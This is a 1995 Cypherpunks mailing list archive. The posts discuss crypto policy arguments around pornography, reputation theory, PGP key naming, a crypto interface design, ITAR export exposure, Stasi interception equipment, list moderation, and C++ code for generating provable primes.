U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From edge at got.net  Thu Nov 23 00:12:11 1995
From: edge at got.net (Jay Campbell)
Date: Thu, 23 Nov 95 00:12:11 PST
Subject: crypto for porno users
Message-ID: <199511230817.AAA22826@you.got.net>


>	a) "no one on the net knows you're a dog" implies that police can
>	pose as a fellow porn producer or consumer and get away with it
>	more easily.
>
>	b) strong crypto for communications between porn users encourages
>	them to speak more freely.  When one of the two is a police officer
>	in disguise, that encourages the other (the suspect) to reveal more,
>	making the investigation proceed more quickly.  Knowing that the
>	crypto is strong enough to keep government eavesdroppers out, the
>	sender is given a false sense of security -- is distracted from
>	thinking about the trustworthiness of the receiver while thinking
>	about the security of the channel itself.

A common way to get around prostitution sting operations is to ask the lady
to expose sensitive portions of her anatomy to prove her sincerity before
the would-be customer commits to any transactions; this sort of thing is
also becoming commonplace on the net for pornography or pirated software,
too. Would-be trafficers often ask a prospective recipient for a small chunk
of fresh files in advance, before passing back anything serious .. partially
out of suspicion, mostly out of greed, but to the same end. A law
enforcement team would be stepping onto shaky ground if they were forced to
transfer illegal images/etc to a suspected trafficer before getting evidence
from him. Entrapment is an ugly concept.

>3. Encryption of porn would work against the kind of porn distribution
>	found on the alt.binary.pictures.erotic... newsgroups.  Encryption
>	requires that recipients be identified.

Not at all .. a porn distributor could generate a key pair, use part A to
encode the images, and dessiminate part B thru a variety of outlets -
publicly posted, sold, passed thru an informal network of like-minded
netizens...

>4. Personal file encryption encourages individuals dealing with porn to
>	encrypt and keep personal diaries which might contain evidence.
>	Since PGP is subject to brute force passphrase attacks, this gives
>	an attack which will open *some* of these diaries.  Without the
>	encryption, the suspect is less likely to keep the diary in the
>	first place.  This isn't a guaranteed opening into all such
>	diaries.  There is no such guarantee possible.  Rather, this
>	suggests that strong crypto has a chance to maximize the effective
>	"take" by LE forces.

I would argue the exact opposite - strong crypto would tend to minimize the
effective take, since there's no guarantee that /anything/ on a perp's
system will be in the clear. I'll let someone else with a better background
pound on the 'brute force' section.

--
   Jay Campbell                edge at got.net - Operations Manager
   -=-=-=-=-=-=-               Sense Networking, Santa Cruz Node
   Jay at Campbell.net            got.net? PGP MIT KeyID 0xACAE1A89           
 
"On the Information Superhighway, I'm the guy 
  behind you in this morning's traffic jam leaning on his horn."






From netsurf at pixi.com  Wed Nov 22 09:05:38 1995
From: netsurf at pixi.com (NetSurfer)
Date: Thu, 23 Nov 1995 01:05:38 +0800
Subject: Pedophiles use encoding devices to make secret use of Internet
In-Reply-To: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>
Message-ID: <Pine.SUN.3.91.951122053926.8346L-100000@akamai.pixi.com>




When I tried this URL I got:

404 Not Found

The requested URL /newsroom/ntn/info/info429_4.html was not found on this 
server. 

On Tue, 21 Nov 1995, Weld Pond wrote:

> 
> Story in Nando Times
> 
> http://www2.nando.net/newsroom/ntn/info/info429_4.html
> 
> 
>       Weld Pond   -  weld at l0pht.com   -   http://www.l0pht.com/
>       L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
>       Technical archives for the people  -  Bio/Electro/Crypto/Radio
> 
> 

-NetSurfer

#include <standard.disclaimer>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
==  =     = |James D. Wilson        |V.PGP 2.7:   512/E12FCD 1994/03/17 >
 "  "  o  " |P. O. Box 15432        |finger netsurf at akamai.pixi.com for  >
 "  " / \ " |Honolulu, HI  96830    |full PGP key; also browse me at     >
\"  "/ G \" |Serendipitous Solutions|http://www.pixi.com/~netsurf       >
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>






From jamesd at echeque.com  Wed Nov 22 09:05:58 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 23 Nov 1995 01:05:58 +0800
Subject: towards a theory of reputation
Message-ID: <199511221621.IAA19163@blob.best.net>



>On Mon, 20 Nov 1995, James A. Donald wrote:
>
>> Any attempt to discuss and analyze reputations using
>> morally neutral language is bound to wind up as boring long
>> winded meaningless complicated word salad.

At 12:19 AM 11/22/95 -0800, Wei Dai wrote:
>I don't understand what you mean by this.  Can you give an example to how 
>to discuss reputation (i.e., the concept of reputation, not a particular 
>reputation) using morally non-neutral language?

Under current circumstances, where we have a large oversupply of
free government supplied retributive violence, the most important
from of reputation is "credit rating", which indicates willingness
to pay ones legitimate debts and perform contracts.

Willingness to fulfill ones obligations is not at all the same thing as
willingness to act in a way that improves other peoples utility.

Fulfilling an obligation assumes normative criteria.  Any
attempt to describe credit worthiness in terms of its effect
on the utility of creditors misses the point.  

Before the nineteenth century, when most governments were reluctant
to provide adequate retributive violence, and were more concerned
with collecting taxes than upholding law and order, the most 
important form of reputation was the reputation for being a 
"gentleman" which encompassed both willingness to pay ones 
just debts and "gentle" conduct, gentle conduct meaning that 
you were unlikely to kill or harm people without good reason,
but did not require that you went around performing good works.

Now if someone has a reputation for good workmanship, this might
seem non normative, but such a reputation is a mixture of two 
components:  "X has good quality products" which is not normative
and is a fact rather than a reputation, because it does not involve 
a prediction of future behavior" and "X will fulfill the spirit 
and intention of a contract" which is a reputation, and is normative.

For example although in principle X might have simultaneously have
reputation for good workmanship and a reputation for not paying 
his debts and not delivering on contracts, such a combination 
would seem unusual and surprising.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From dreschs at mpd.tandem.com  Wed Nov 22 10:07:10 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Thu, 23 Nov 1995 02:07:10 +0800
Subject: Pedophiles use encoding devices to make secret use of Internet
In-Reply-To: <Pine.BSD/.3.91.951121205509.15079A-100000@l0pht.com>
Message-ID: <199511221739.LAA28319@galil.austnsc.tandem.com>



N> When I tried this URL I got:

N> 404 Not Found

N> The requested URL /newsroom/ntn/info/info429_4.html was not found on
N> this server.

	Nando seems to be having problems - I got the same error several
times following links on it.


-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3





From anonymous-remailer at shell.portal.com  Wed Nov 22 10:16:53 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 23 Nov 1995 02:16:53 +0800
Subject: key for Alice as promised
Message-ID: <199511221754.JAA19505@jobe.shell.portal.com>


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 21 Nov 1995, I wrote:

> On Tue, 21 Nov 1995, Russell Nelson wrote:
> 
> > anonymous-remailer at shell.portal.com writes:
> > > Alice here ...
> > 
> > How do we know this for a fact?
> 
> We don't.
> 
> As an incentive for Alice to generate herself a PGP key, I hereby
> place Alice on notice that if she doesn't sign her next post, and
> provide a PGP key, I will create one for her, and steal all the
> postive (?) reputation that she has developed so far.
> 
> You have 24 hours Alice, otherwise a key gets posted to here, and to
> the keyservers with your nym on it.

Well 24 hours have passed, and Alice remains unrepentant:

On Tue, 21 Nov 1995, the old Alice de 'nonymous wrote:

> Alice here ...
> 
> No, *I* am the real Alice, and I refuse to use PGP signing.

So here we go Alice's key:

Type bits/keyID    Date       User ID
pub  1024/23292ED1 1995/11/22 Alice de 'nonymous <cypherpunks at toad.com>
          Key fingerprint =  CA 76 81 41 54 CE E7 D6  62 EE 6D 65 EE FB A3 55

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzCzCFsAAAEEAKR2yXr+FeTjjR0YdGboF9KN4nxTRJ1STZ0CEsL5gTHQcCEo
+ELfT2ejkFFtoW9y8c1b6YVItstdPTBZ4TomzM2h1bgToKRn0vRliO4DpOF1J1sZ
+2PJwSK22OGIIvSTKf15S7vxRRa6Xnw5IM3WzU5lIrh1OwH7RIbu8OQjKS7RAAUR
tClBbGljZSBkZSAnbm9ueW1vdXMgPGN5cGhlcnB1bmtzQHRvYWQuY29tPokAlQMF
EDCzCdqG7vDkIyku0QEBW2sD/REBXmnHJ6Nr/xEUoJGr3CbH9voIGQkkzINplsrk
koqXlI9puVkBkPUtTMnsewDyUumRR54ZDQ+sApi7rYa/DsSpWbiDaDC1kS5qKHT+
gfBfIxCkEt3Zjzot8vWKJgpC4GY5WC7q5bkmqcfrBNBctl5aWI1lD1qV6iIZ/9fW
2PEA
=h413
- -----END PGP PUBLIC KEY BLOCK-----

Anything posted without being signed by the above key isn't from me.

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLNjIIbu8OQjKS7RAQETOAQAjLmudAEP/z61BylOtyFhCif5U/BrQ2Pd
uWLdy12Z16YVpczNEXeHDztsIE1BTNeGrb85OJywqc3G0M5WU9zzIRY+QlgPJzzJ
CFx5danXzVr5A6Bmp2TponUZ4mE1qNoDfANlHMt4nSV1Fn4JqU89sJx7WSmQE0o5
KlPw3Yo4E48=
=eOri
-----END PGP SIGNATURE-----






From A.Back at exeter.ac.uk  Wed Nov 22 10:19:53 1995
From: A.Back at exeter.ac.uk (A.Back at exeter.ac.uk)
Date: Thu, 23 Nov 1995 02:19:53 +0800
Subject: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
In-Reply-To: <199511221609.LAA21172@jekyll.piermont.com>
Message-ID: <5579.199511221742@olib>



Perry Metzger <perry at piermont.com> writes:
> "James M. Cobb" writes:
> > Friend, 
> >  
> >  
> > The following information from 
> 
> 1) You are not my friend.
> 
> 2) My private mail to you hasn't convinced you to stop this barrage of
>    reposts. Would you please do so?

I am inclined to agree with Perry in as much as the volume of posts to
the cypherpunks list is greatly increased by reposts of news from
other mailing lists, USENET newsgroups, WWW sources, newspapers, TV
programs, films, books, talks, etc.  While some of the information
posted is interesting, and relevant, some others are less relevant,
bordering on noise.

It is much more efficient of list bandwidth to post short pointers
only, of the style John Young <jya at pipeline.com> posts.  Or an
alternative I have been thinking might be useful: a separate list.

The proposal: a separate list for current-event reports/news/reposts.

I think it would be useful if a separate mailing list were set up on
toad.com, called say "cypherpunks-news at toad.com" (or whatever) to
distinguish it from the main cypherpunks list.

That way people who aren't interested to read reposts just don't
subscribe to cypherpunks-news, and those who want to catch up on
cypherpunks related current events, media reports etc, can browse
through the archives for cypherpunks-news.

What do others think?

Adam





From wb8foz at nrk.com  Wed Nov 22 10:30:41 1995
From: wb8foz at nrk.com (David Lesher)
Date: Thu, 23 Nov 1995 02:30:41 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130500acd7e7228be6@[199.1.154.51]>
Message-ID: <199511220222.VAA00560@nrk.com>


> 
> The FBI's "requirements" present an entertaining set of logistical
> problems.  Simply equipping the switches to handle the extra capacity,
> especially during busy hour, is problematic.

The sources I consulted were nowhere near as restrained.
"Out of their trees" was the most concise reply I heard.
And *this* was from someone WORKING in the FI community
in technical areas.



-- 
A host is a host from coast to coast.................wb8foz at nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433





From fstuart at vetmed.auburn.edu  Wed Nov 22 10:47:39 1995
From: fstuart at vetmed.auburn.edu (Frank Stuart)
Date: Thu, 23 Nov 1995 02:47:39 +0800
Subject: Spam the Sign!
Message-ID: <199511221816.MAA13933@snoopy.vetmed.auburn.edu>


>[regarding suggestion that netscape give mit or someone a 128 bit version 
>to place on an ftp server]
>
>This is not an apology for the the ITAR, just my usual lawyerly overcaution:
>
>Suppose A gives B a program that is export controlled, intending for B to 
>allow it to be exported.  Has A conspired with B to export the program?
>
>Let's ask the grand jury investigating Phil....

That's a possible problem, I suppose, but wouldn't you be protected if
your license agreement with MIT (or whoever) specified redistribution
"for domestic use only"?


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart at vetmed.auburn.edu | when you take into account Hofstadter's Law.





From raph at c2.org  Wed Nov 22 10:50:14 1995
From: raph at c2.org (Raph Levien)
Date: Thu, 23 Nov 1995 02:50:14 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <9511221641.AA14712@tis.com>
Message-ID: <Pine.SUN.3.91.951122094209.29001A-100000@infinity.c2.org>


On Wed, 22 Nov 1995, Carl Ellison wrote:

> >Date: Sat, 18 Nov 1995 00:42:21 -0800 (PST)
> >From: Raph Levien <raph at c2.org>
>
> >   I propose that the new interface lives as a sort of daemon, rather
> >than a static collection of command line script pieces. 
> 
> Danger, Will Robinson!  (see below)

   In restrospect, "daemon" was a poor choice of words to describe my
proposal. "Slave process" gets the idea across much better, but may be a
bit less PC. A daemon sits on a publicly accessible port, such as a TCP/IP
socket. The slave process is only accessible to the user who invoked it
(enforced by the OS's file permissions). Further, it only gives secrets to
individual processes that authenticated themselves first (by sending a
passphrase down the connection to the slave process). 

> >   Once the negotation has been established, the application can send
> >the daemon MIME objects that the app does not understand but the
> >daemon does (for example, an image/fractal). The daemon can return a
> >MIME object that the app does understand (for example, an image/ppm).
> 
> This part sounds good...a sort of master translation service.

   I'm glad you like it!

> >   Alternatively, the daemon may request an authentication. This is
> >useful when resolving external bodies that require authentication,
> >including non-anonymous FTP, and standard authenticated HTTP. In this
> >case, the daemon sends a message to the app requesting the
> >authentication. It specifies whether it needs both username and
> >password, or just password. In the latter case, it hands a username to
> >the application.
> >   The application can then query the user for the authentication
> >data. It hands this back to the daemon. In reply, the daemon indicates
> >success or failure. In case of success, it hands the object back to
> >the app.
> 
> Now I get worried.  This communication with the demon is via some IPC --
> maybe even via a LAN.  Some things can't be distributed safely and
> authentication is #2 on my list.

   No, the communication is not via a LAN. On a Unix system, the 
communication is through Domain Sockets. Both processes live on the same 
machine, and the socket "lives" on the local file system.

   I submit that my proposal is every bit as secure as, say, PGP is now. 
If you can't trust the operating system not to hand domain sockets from 
one process to another, then you certainly can't trust it to, for 
example, substitute different binaries for the crypto program (an attack 
which Ian et al cleverly mounted a few weeks ago).
   If it were not the case that my proposal was as secure as PGP, then I 
would want to withdraw it. However, the proposal has so many advantages 
that I would want to see a serious description of the attack, rather than 
just feelings of endangerment to Will Robinson.

> >   Encryption is a bit more tricky, but in essence you just hang a
> >premail-alike off this kind of protocol. The hard part is specifying
> >the key, but you just call it a "parameter" and put in hooks for the
> >daemon to ask for whatever parameters it needs. 
> 
> Crypto keys are #1 on my list of things you can't distribute (unless they
> are wrapped, of course).

   I should have made it cleaer that I am referring to public keys. If 
public keys are on the list of things that can't be distributed, then I 
believe we are in trouble.

> >						 This requires that
> >keys have some nonforgeable names, which is unfortunately not a
> >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
> >Certifcation Authority (<wink> at Nick Szabo).
> 
> Public keys, if that's what you're talking about, have perfectly good
> nonforgeable names -- themselves.  They are unique.  They are the proper
> name which can collect all the attributes of that key which are of interest
> (e.g., permission to spend $, name of a human who knows the private key,
> attributes about that human, etc.).

   Ok. But public keys have one serious disadvantage: their size. I can't 
put a public key on my business card or read it over the phone. I want a 
unforgeable key name. I want this to be the standard key name in the 
interface between the application and the crypto engine. I want users to 
be able to specify them directly, at the very least to bootstrap the 
public key infrastructure.
   I propose using the MD5 hash of the whitespace-free MOSS 
representation of the public key, in hex. It's simple enough to be 
described in one sentence, but does everything I want.

   Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
name of a public key, unless you do a horrible hack such as replace the 
pubring.pgp file with the one public key of interest. This is a 
significant problem when trying to identify which key signed a signed 
message. I haven't bashed around with TISMOSS enough, but I'm not sure it 
will allow this either. I got the impression that it preferred the use of 
an alias.

> >   One final aside: I've been fairly frustrated with this mailing list
> >as a forum for talking about real design proposals and implementation
> >issues. Ignorant posts by the likes of Dr. Fred and Alice d'Clueless
> >tend to attract far more attention than real crypto work. I want a
> >forum for, and just for, cypherpunks who write code. If I had just a
> >smidgen more free time (as if), I'd be trying to start one
> >myself. Anyone else?
> 
> I've seen this happen several times.  As a list gets popular, it
> diversifies.  You might try sci.crypt.research -- since it's moderated.

   Thanks for the suggestion. However, my concerns are with 
implementation and deployment, not research.  I am perfectly willing to 
consider cryptographic algorithms to be black boxes that do what they say 
they will. I think the charter exists to start a new list. John Gilmore 
has already offered to start a "coderpunks" list on toad.com. Shall we 
take him up on it?

Raph







From anonymous-remailer at shell.portal.com  Wed Nov 22 10:56:06 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Thu, 23 Nov 1995 02:56:06 +0800
Subject: No Subject
In-Reply-To: <acd75bfd090210044420@[205.199.118.202]>
Message-ID: <199511221809.KAA21408@jobe.shell.portal.com>


> Romania or Bulgaria, or even Russia. They may still have
> the old listening infrastructure in place, although I
> hear that Stasi headquarters in the former DDR is now an
> acupuncture clinic.

The Stasi listening infrastructure wasn't solely in their
headquarters. Listening stations for terrestrial frequencies were
spread along the borders, notably here is the station on the Brocken,
a mountain in the Harz. The central station for interception of
satellite traffic (read: international telephone communication, even
when not entering or leaving the country) was located in Biesenthal, a
small town near Berlin.

It's hard to reconstruct what part of interception took place in the
Stasi HQ, my guess is that all international telephone traffic leaving
or entering the country was intercepted there. For technical reasons
it was impossible to intercept all domestic traffic from a single
central location, the telephone system worked on a purely mechanical
basis. It seems that almost all of the telephone surveillance
equipment was destroyed during the revolution or shortly after.

Things look different for the mentioned radio equipment. The Stasi
used a combination of Russian and self-made technology. The
top-of-the-notch Russian equipment is back in Russia. But most of the
Russian equipment was sold by the Russian guards (their pay is
_really_ low, even more so when compared to western money), the Stasi
equipment was forgotten about and eventually stolen. This equipment is
now mainly in the hands of about 3 or 4 individuals.







From weidai at eskimo.com  Thu Nov 23 03:08:12 1995
From: weidai at eskimo.com (Wei Dai)
Date: Thu, 23 Nov 95 03:08:12 PST
Subject: generating provable primes
Message-ID: <Pine.SUN.3.91.951123024142.12404A-100000@eskimo.com>


Several days ago someone (I forgot who he was) asked about code for 
primality tests.  I just implemented an algorithm to generate random 
provable primes that is only about 50% slower than generating probable 
primes.  It will be in the next version of Crypto++, but I've attached 
code for the main function in case anyone is interested in the 
algorithm.  Full description can be found in "Fast Generation of Prime 
Numbers and Secure Public-Key Cryptographic Parameters" by U.M. Maurer in 
Journal of Cryptology, Volume 8 Number 3, 1995.  The paper also describes 
a more complicated algorithm that produces primes with a more uniform 
distribution.

There was discussion some days ago about generating strong primes 
for DH exchange moduli.  Eric Young reported that he spent tens of hours 
of CPU time to generate a 4096 bit prime p such that (p-1)/2 is also 
prime.  However, there is really no reason why DH exchange moduli must be of 
the form 2q+1 where q is a prime.  It should be sufficient that they are 
of the form rq+1, where q is a large enough prime (say more than 256 
bits).  The following algorithm generates a provable prime p=2rq+1, where q 
is a prime with at least half the length of p.

bignum ProvablePrime(RandomNumberGenerator &rng, unsigned int bits)
{
	const unsigned smallPrimeBound = 29, c_opt=10;
	bignum p;

	BuildPrimeTable();
	if (bits < smallPrimeBound)
	{
		do
			p.Randomize(rng, bignum::Power2(bits-1), 
bignum::Power2(bits)-1, ODD);
		while (TrialDivision(p, 1 << ((bits+1)/2)));
	}
	else
	{
		const unsigned margin = bits > 50 ? 20 : (bits-10)/2;
		double relativeSize;
		do
			relativeSize = pow(2.0, 
double(rng.GetLong())/0xffffffff - 1);
		while (bits * relativeSize >= bits - margin);
		
		bignum a,b;
		bignum q = ProvablePrime(rng, unsigned(bits*relativeSize));
		bignum I = bignum::Power2(bits-2)/q;
		bignum I2 = I << 1;
		unsigned int trialDivisorBound = (unsigned 
int)min((unsigned long)primeTable[primeTableSize-1], (unsigned 
long)bits*bits/c_opt);
		boolean success = FALSE;
		do
		{
			p.Randomize(rng, I, I2, ANY);
			p *= q; p <<= 1; ++p;
			if (!TrialDivision(p, trialDivisorBound))
			{
				a.Randomize(rng, 2, p-1, ANY);
				b = a.ExponentiateMod((p-1)/q, p);
				success = (Gcd(b-1, p) == 1) && 
(b.ExponentiateMod(q, p) == 1);
			}
		}
		while (!success);
	}
	return p;
}






From perry at piermont.com  Wed Nov 22 11:08:15 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 23 Nov 1995 03:08:15 +0800
Subject: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
In-Reply-To: <5579.199511221742@olib>
Message-ID: <199511221828.NAA21403@jekyll.piermont.com>



A.Back at exeter.ac.uk writes:
> It is much more efficient of list bandwidth to post short pointers
> only, of the style John Young <jya at pipeline.com> posts.

I agree with you.  John's posts are not always strictly on topic but
they are always just pointers, and he typically posts them in a single
group a day. They are also always very high quality information. I
find them to be perfectly fine. 

The recent "Friend;" stuff just annoyed me, though.

Perry





From cme at TIS.COM  Wed Nov 22 11:11:00 1995
From: cme at TIS.COM (Carl Ellison)
Date: Thu, 23 Nov 1995 03:11:00 +0800
Subject: Design proposal: crypto-capable generic interface
Message-ID: <9511221840.AA24587@tis.com>


>Date: Wed, 22 Nov 1995 10:11:00 -0800 (PST)
>From: Raph Levien <raph at c2.org>
>Subject: Re: Design proposal: crypto-capable generic interface
>Message-Id: <Pine.SUN.3.91.951122094209.29001A-100000 at infinity.c2.org>



>   In restrospect, "daemon" was a poor choice of words to describe my
>proposal. "Slave process" gets the idea across much better, 

I'm a great fan of programming by cooperating processes -- but I still
worry when it comes to crypto.  What we need to do, if we want real
security, is hold all the crypto secrets (therefore the crypto itself) in a
device (PCMCIA card?)  in the physical posession of the user.  The
cooperating-process model could make that easier -- but, if designed wrong,
it could call for the device to give up a secret to be sent by IPC over to
the slave process.


>> >						 This requires that
>> >keys have some nonforgeable names, which is unfortunately not a
>> >feature of PGP 2.6.2. S/MIME will do it just fine, if you buy into the
>> >Certifcation Authority (<wink> at Nick Szabo).
>> 
>> Public keys, if that's what you're talking about, have perfectly good
>> nonforgeable names -- themselves.  They are unique.  They are the proper
>> name which can collect all the attributes of that key which are of interest
>> (e.g., permission to spend $, name of a human who knows the private key,
>> attributes about that human, etc.).
>
>   Ok. But public keys have one serious disadvantage: their size. 
[...]

>   I propose using the MD5 hash of the whitespace-free MOSS 
>representation of the public key, in hex. It's simple enough to be 
>described in one sentence, but does everything I want.

That sounds fine -- but why deal with a text MOSS representation?  It's the
modulus which is unique -- so just hash the binary bytes of the modulus,
MSB first.  There's no need to force anyone checking a key to have all the
MOSS printing software in the loop.  You might also consider using SHA
instead of MD5 -- but that adds to the character count on your business
card.  [I printed up my own business cards with PGP fingerprints for my 2
primary keys -- and it took up about 1/4 of the card, in a readable font.]

>   Note that PGP 2.6.2 does _not_ allow the use of a public key as the 
>name of a public key, unless you do a horrible hack such as replace the 
>pubring.pgp file with the one public key of interest.

PGP keyring structures do use the key as its own name, I believe.  The
UserID is a separate entity, associated with the stand-alone key.  A
signature applies to a pair (UserID,Key).

If I could change the PGP keyring structure, I'd add a new entity -- an
Attribute block -- a string and my key ID, with a signature on the
Attribute+ObjectKey.  This can be done today with the UserID and signature
-- and I've even tried it.  It works, but PGP is used to accessing keys by
the text in a UserID field and that's not appropriate.  The Attribute would
give a statement I'm prepared to stand by, giving testimony about the key
being signed or the person who has demonstrated the ability to sign
something I've verified with that key.

We might need to add something like MOSS's aliases, for my use only, to let
me access keys.  If I know someone as Bobby -- that's an association in my
own head -- not applicable to anyone else.  When I access him by that
alias, that's for my use.  Therefore, only I should define it and only I
should sign the association.  This is what I'd use instead of PGP's
UserID blocks -- alias blocks.

I commend TIS/MOSS's aliases to people's study.  The MOSS guys have used
the alias structure not only to define nicknames of importance only to me
but also to define crypto-lists (like mailing lists).

Needless to say, the assignment of aliases needs to be protected.  An
attacker mustn't be allowed to slip a new alias and/or new key into your
ring -- especially if it's a crypto-list definition.


>   Thanks for the suggestion. However, my concerns are with 
>implementation and deployment, not research.  I am perfectly willing to 
>consider cryptographic algorithms to be black boxes that do what they say 
>they will. I think the charter exists to start a new list. John Gilmore 
>has already offered to start a "coderpunks" list on toad.com. Shall we 
>take him up on it?

My suggestion is that if you want this limited in content, it'll have to be
moderated.

 - Carl


 +--------------------------------------------------------------------------+
 |Carl M. Ellison      cme at tis.com    http://www.clark.net/pub/cme          |
 |Trusted Information Systems, Inc.   http://www.tis.com/                   |
 |3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
 |Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
 +--------------------------------------------------------------------------+





From mdiehl at dttus.com  Wed Nov 22 12:13:58 1995
From: mdiehl at dttus.com (Martin Diehl)
Date: Thu, 23 Nov 1995 04:13:58 +0800
Subject: PROPOSAL: cypherpunks-news@toad.com?
Message-ID: <9510228170.AA817074264@cc3.dttus.com>


     On 11/22/95, Adam Writes:
     
     > Perry Metzger <perry at piermont.com> writes:
     > > "James M. Cobb" writes:
     > > > Friend, 
     > > >  
     > > >  
     > > > The following information from 
     > > 
     > > 1) You are not my friend.
     > > 
     > > 2) My private mail to you hasn't convinced you to stop this
     > > barrage of reposts. Would you please do so?
     
     > I am inclined to agree with Perry in as much as the volume of posts 
     > to the cypherpunks list is greatly increased by reposts of news from 
     > other mailing lists, USENET newsgroups, WWW sources, newspapers, TV 
     > programs, films, books, talks, etc.  While some of the information
     > posted is interesting, and relevant, some others are less relevant, 
     > bordering on noise.
     
     [SNIP]
     
     > The proposal: a separate list for current-event
     > reports/news/reposts.
     
     [SNIP]
     
     > What do others think?
     
     > Adam
     
     This is what I think about setting up an additional list:
     
     1. If I subscribe to both lists, it won't change my eMail traffic
     
     2. If the "news, NOISE, off-topic" posts are sent to both lists, my 
     eMail volume will increase
     
     3. The cypherpunks subscribers are not the problem
     
     4. What Adam and Perry (and others) want is that the "news, NOISE, 
     off-topic" posters change their behavior and not post long news items 
     verbatim.
     
     5. How are you going to get those posters to agree to change?
     
     My vote, for what it's worth, is don't split the list.  It won't work 
     because the extra posts ARE going to go to this list because that's 
     where they believe their readers are.
     
     Martin G. Diehl
     






From ses at tipper.oit.unc.edu  Wed Nov 22 12:21:54 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Thu, 23 Nov 1995 04:21:54 +0800
Subject: Secrets of the Internet
In-Reply-To: <199511221933.OAA12393@pipe1.nyc.pipeline.com>
Message-ID: <Pine.SOL.3.91.951122113850.23852D-100000@chivalry>


On Wed, 22 Nov 1995, tallpaul wrote:
>  
> Turing killed himself after being dogged by the UK's intelligence
> establishment over his sexual orientation. Ain't no way they're going to
> unfreeze *him* to work on the issue of "kiddie porn."

You still believe that cover story? :-)







From froomkin at law.miami.edu  Wed Nov 22 12:36:28 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Thu, 23 Nov 1995 04:36:28 +0800
Subject: Spam the Sign!
In-Reply-To: <199511221816.MAA13933@snoopy.vetmed.auburn.edu>
Message-ID: <Pine.SUN.3.91.951122145559.24028D-100000@viper.law.miami.edu>


On Wed, 22 Nov 1995, Frank Stuart wrote:

> >[regarding suggestion that netscape give mit or someone a 128 bit version 
> >to place on an ftp server]
> >
> >This is not an apology for the the ITAR, just my usual lawyerly overcaution:
> >
> >Suppose A gives B a program that is export controlled, intending for B to 
> >allow it to be exported.  Has A conspired with B to export the program?
> >
> >Let's ask the grand jury investigating Phil....
> 
> That's a possible problem, I suppose, but wouldn't you be protected if
> your license agreement with MIT (or whoever) specified redistribution
> "for domestic use only"?
> 
"protected"? No.  "Helped"? Yes.  The government can argue to the jury 
that the agreement was a sham and you knew it....

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From bplib at wat.hookup.net  Thu Nov 23 04:39:11 1995
From: bplib at wat.hookup.net (Tim Philp)
Date: Thu, 23 Nov 95 04:39:11 PST
Subject: PGP in Canada
In-Reply-To: <Pine.A32.3.91.951122213807.121948C@juliet.stfx.ca>
Message-ID: <Pine.OSF.3.91.951123073901.6893B-100000@nic.wat.hookup.net>


You can try to get PGP from the MIT site but it may not allow you to do 
so if it does not recognize your address as being Canadian. I tried to 
get PGP-Phone and it told me that it did not think that I was a Canadian. 
I wrote to the administrator but have never received a reply. I checked 
about a week ago and I still could not get the file.
Tim Philp

===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys at swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================








From tallpaul at pipeline.com  Wed Nov 22 12:42:43 1995
From: tallpaul at pipeline.com (tallpaul)
Date: Thu, 23 Nov 1995 04:42:43 +0800
Subject: Secrets of the Internet
Message-ID: <199511221933.OAA12393@pipe1.nyc.pipeline.com>


On Wed. 22 Nov 1995 Simon Spero wrote in "Re:SEcrets of the Internet" that
we should "never underestimate the power of GCHQ -- when they unfreeze Alan
Turing from the cryogenic vault, good things happen." 
 
Not to worry. 
 
Turing killed himself after being dogged by the UK's intelligence
establishment over his sexual orientation. Ain't no way they're going to
unfreeze *him* to work on the issue of "kiddie porn."





From perry at piermont.com  Wed Nov 22 12:43:28 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 23 Nov 1995 04:43:28 +0800
Subject: "Dear Newt" Letter...
In-Reply-To: <9511210055.AA29106@zorch.w3.org>
Message-ID: <199511220100.UAA17883@jekyll.piermont.com>



hallam at w3.org writes:
> 
> >Er, Newt was the one who railed against the Exon censorship bill, and
